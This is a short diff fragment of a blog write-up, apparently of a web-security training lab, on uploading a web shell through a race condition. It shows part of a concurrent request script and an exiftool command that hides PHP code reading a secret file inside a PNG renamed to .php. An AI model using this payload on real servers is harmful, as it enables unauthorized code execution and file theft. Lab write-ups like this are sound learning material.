CamoCatX/camocatx.github.io/blog/_posts/2022-05-09-expert-lab-web-shell-upload-via-race-condition.md

         table.add(req)
 ```

 I set concurrentConnections=80 by trial and error, more was hindering the main upload request so I set to 80.
-Then I downloaded a 500KB PHP file from the web and used exiftool to add this code to it and renamed it to a PHP file:
+Then I downloaded a random 500KB PNG file from the web and used exiftool to add this code to it and renamed it to a PHP file:

 ```
 exiftool -comment="<?php echo file_get_contents('/home/carlos/secret'); ?>" diamond.php